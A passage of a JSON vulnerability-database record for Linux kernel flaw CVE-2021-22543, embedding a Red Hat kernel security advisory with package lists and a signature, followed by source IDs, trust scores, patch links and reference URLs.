ppc64le, x86_64\n\n3. Description:\n\nThis is a kernel live patch module which is automatically loaded by the RPM\npost-install script to modify the code of a running kernel. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: kernel security and bug fix update\nAdvisory ID: RHSA-2021:3987-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:3987\nIssue date: 2021-10-26\nCVE Names: CVE-2019-20934 CVE-2020-36385 CVE-2021-3653 \n CVE-2021-3656 CVE-2021-22543 CVE-2021-37576 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.7\nAdvanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update\nSupport, and Red Hat Enterprise Linux 7.7 Update Services for SAP\nSolutions. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Server AUS (v. 7.7) - noarch, x86_64\nRed Hat Enterprise Linux Server E4S (v. 7.7) - noarch, ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64\nRed Hat Enterprise Linux Server Optional E4S (v. 7.6) - ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 7.7) - noarch, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nBug Fix(es):\n\n* A race between i40e_ndo_set_vf_mac() and i40e_vsi_clear() in the i40e\ndriver causes a use after free condition of the kmalloc-4096 slab cache. \n(BZ#1980333)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Package List:\n\nRed Hat Enterprise Linux Server AUS (v. 7.7):\n\nSource:\nkernel-3.10.0-1062.59.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.59.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.59.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.59.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server E4S (v. 7.7):\n\nSource:\nkernel-3.10.0-1062.59.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.59.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.59.1.el7.noarch.rpm\n\nppc64le:\nbpftool-3.10.0-1062.59.1.el7.ppc64le.rpm\nbpftool-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debug-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-devel-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-headers-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-tools-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-1062.59.1.el7.ppc64le.rpm\nperf-3.10.0-1062.59.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\npython-perf-3.10.0-1062.59.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\n\nx86_64:\nbpftool-3.10.0-1062.59.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 7.7):\n\nSource:\nkernel-3.10.0-1062.59.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1062.59.1.el7.noarch.rpm\nkernel-doc-3.10.0-1062.59.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1062.59.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 7.7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional E4S (v. 7.6):\n\nppc64le:\nbpftool-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-1062.59.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 7.7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1062.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1062.59.1.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-20934\nhttps://access.redhat.com/security/cve/CVE-2020-36385\nhttps://access.redhat.com/security/cve/CVE-2021-3653\nhttps://access.redhat.com/security/cve/CVE-2021-3656\nhttps://access.redhat.com/security/cve/CVE-2021-22543\nhttps://access.redhat.com/security/cve/CVE-2021-37576\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYXew09zjgjWX9erEAQh/NRAAlpTOJdaVIZiu4IJtVrtRh2JGkgTlL2Pi\nKIpqyIeBFsUwRh0pg9GE10q4NRk/DqMYTXvc2GJaNUZlRbzEhLxZXKqksfea6kmo\nwwGdORkerZrbE8QYF/FRC/6Bxi99lvoH0rSEeJeX0bM6vVwu9ubp7Xbdp4hmq08S\n1VsG5ftGK6hQJPyxVDgPIHK1FHE5dVz1puyM10eY5NgabKCdD8oCC9/OL1hxFjAv\nADTfFombilFItZoYa9rQdpoQ7s5CBZ1H6VbA+d9CvUltfzRzr6EUflL/rM3af3s1\nPTSGqTSqdAZRoebwFvqKlHSoK2B7Wrinxs0kIGbvf3S2MbGklfzb6GaB4QZZ490T\nWRuTiJZTvMP0jqQyW0nTCMbxfqo3NgKbQt2wQSGYYDlwq65vhuuQAghGVPEoBPhS\nT9inwoSthoj7uxni1E58TXwPhzfEPXSTAkEZvu05BLt1AXRA+RrNH/B7VIHx30oX\nfkdz6MFeO/SWIb/CWf5YQVD3Xfsk+9rg2JWGWjnAE2WV9lhsVqhlidL36uaL6kmA\nLGrb/ZQcsVIPIM+HQRme15MBsg3GervoIHWkWOPbXvU4fYHxID2YkLMZQ6vtGHE2\nDHe1+11yo2WKvdWB5nrbsIDBYBJLKT12DxsbycCeH2rLS7qDsfw/XDshAaFnPXZM\nG9cg8fFnilE=\n=hTrt\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-22543"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
},
{
"db": "VULHUB",
"id": "VHN-380980"
},
{
"db": "VULMON",
"id": "CVE-2021-22543"
},
{
"db": "PACKETSTORM",
"id": "164565"
},
{
"db": "PACKETSTORM",
"id": "163926"
},
{
"db": "PACKETSTORM",
"id": "163770"
},
{
"db": "PACKETSTORM",
"id": "164469"
},
{
"db": "PACKETSTORM",
"id": "163995"
},
{
"db": "PACKETSTORM",
"id": "164237"
},
{
"db": "PACKETSTORM",
"id": "164666"
},
{
"db": "PACKETSTORM",
"id": "164652"
}
],
"trust": 2.52
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-22543",
"trust": 4.2
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/06/26/1",
"trust": 1.8
},
{
"db": "PACKETSTORM",
"id": "164666",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "164589",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167858",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "164583",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "163995",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "164237",
"trust": 0.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/26/3",
"trust": 0.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/26/4",
"trust": 0.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/26/5",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3485",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3324",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3034",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3626",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2959",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3372",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2764",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3536",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3173",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3554",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4163",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3249",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3389",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3015",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2899",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4156",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2691",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3137",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4282",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3456",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4089",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3499",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2789",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164331",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "163865",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164098",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164562",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164076",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164223",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164431",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164186",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164028",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164484",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "163767",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164477",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021082206",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021083123",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021111726",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072069",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021102111",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021090126",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021101336",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022020931",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021100618",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1684",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164652",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-380980",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-22543",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164565",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163926",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163770",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164469",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-380980"
},
{
"db": "VULMON",
"id": "CVE-2021-22543"
},
{
"db": "PACKETSTORM",
"id": "164565"
},
{
"db": "PACKETSTORM",
"id": "163926"
},
{
"db": "PACKETSTORM",
"id": "163770"
},
{
"db": "PACKETSTORM",
"id": "164469"
},
{
"db": "PACKETSTORM",
"id": "163995"
},
{
"db": "PACKETSTORM",
"id": "164237"
},
{
"db": "PACKETSTORM",
"id": "164666"
},
{
"db": "PACKETSTORM",
"id": "164652"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1684"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
},
{
"db": "NVD",
"id": "CVE-2021-22543"
}
]
},
"id": "VAR-202105-1451",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-380980"
}
],
"trust": 0.01
},
"last_update_date": "2026-04-10T23:33:59.314000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Linux\u00a0Kernel\u00a0Archives NetAppNetApp\u00a0Advisory",
"trust": 0.8,
"url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00010.html"
},
{
"title": "Red Hat: Important: kernel security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225640 - Security Advisory"
},
{
"title": "Red Hat: CVE-2021-22543",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2021-22543"
},
{
"title": "Amazon Linux 2: ALAS2-2021-1699",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2021-1699"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-22543 log"
},
{
"title": "Amazon Linux AMI: ALAS-2021-1539",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2021-1539"
},
{
"title": "Amazon Linux 2: ALAS2KERNEL-5.4-2022-004",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2KERNEL-5.4-2022-004"
},
{
"title": "Amazon Linux 2: ALAS2KERNEL-5.10-2022-002",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2KERNEL-5.10-2022-002"
},
{
"title": "CVE-2021-22543",
"trust": 0.1,
"url": "https://github.com/JamesGeeee/CVE-2021-22543 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-22543"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-119",
"trust": 1.1
},
{
"problemtype": "Buffer error (CWE-119) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-380980"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
},
{
"db": "NVD",
"id": "CVE-2021-22543"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22543"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20210708-0002/"
},
{
"trust": 1.8,
"url": "https://github.com/google/security-research/security/advisories/ghsa-7wq5-phmq-m584"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00010.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00012.html"
},
{
"trust": 1.8,
"url": "http://www.openwall.com/lists/oss-security/2021/06/26/1"
},
{
"trust": 1.4,
"url": "https://access.redhat.com/security/cve/cve-2021-22543"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4g5ybuvephzyxmkngbz3s6infcteel4e/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/roqixqb7zawi3ksgshr6h5rduwzi775s/"
},
{
"trust": 0.8,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/roqixqb7zawi3ksgshr6h5rduwzi775s/"
},
{
"trust": 0.8,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4g5ybuvephzyxmkngbz3s6infcteel4e/"
},
{
"trust": 0.7,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.7,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.6,
"url": "http://www.openwall.com/lists/oss-security/2021/05/26/5"
},
{
"trust": 0.6,
"url": "http://www.openwall.com/lists/oss-security/2021/05/26/3"
},
{
"trust": 0.6,
"url": "http://www.openwall.com/lists/oss-security/2021/05/26/4"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2899"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3034"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021090126"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4089"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3554"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4282"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4163"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021083123"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164431/ubuntu-security-notice-usn-5106-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2789"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021111726"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164484/red-hat-security-advisory-2021-3802-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3485"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164098/ubuntu-security-notice-usn-5070-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164186/ubuntu-security-notice-usn-5071-2.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3324"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164589/ubuntu-security-notice-usn-5120-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164562/red-hat-security-advisory-2021-3925-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167858/red-hat-security-advisory-2022-5640-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164331/ubuntu-security-notice-usn-5094-1.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021082206"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022020931"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3249"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2959"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164666/red-hat-security-advisory-2021-4000-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164028/red-hat-security-advisory-2021-3262-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2764"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3137"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3456"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3015"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3499"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3372"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3173"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163995/red-hat-security-advisory-2021-3363-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021101336"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164223/red-hat-security-advisory-2021-3598-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072069"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163767/red-hat-security-advisory-2021-3044-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3626"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164583/red-hat-security-advisory-2021-3949-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3536"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-memory-corruption-via-dev-kvm-35543"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164076/red-hat-security-advisory-2021-3454-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164477/red-hat-security-advisory-2021-3814-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2691"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164237/ubuntu-security-notice-usn-5071-3.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3389"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4156"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021100618"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021102111"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163865/red-hat-security-advisory-2021-3173-01.html"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3609"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22555"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-22555"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3609"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-37576"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-37576"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/2974891"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5640"
},
{
"trust": 0.1,
"url": "https://github.com/jamesgeeee/cve-2021-22543"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
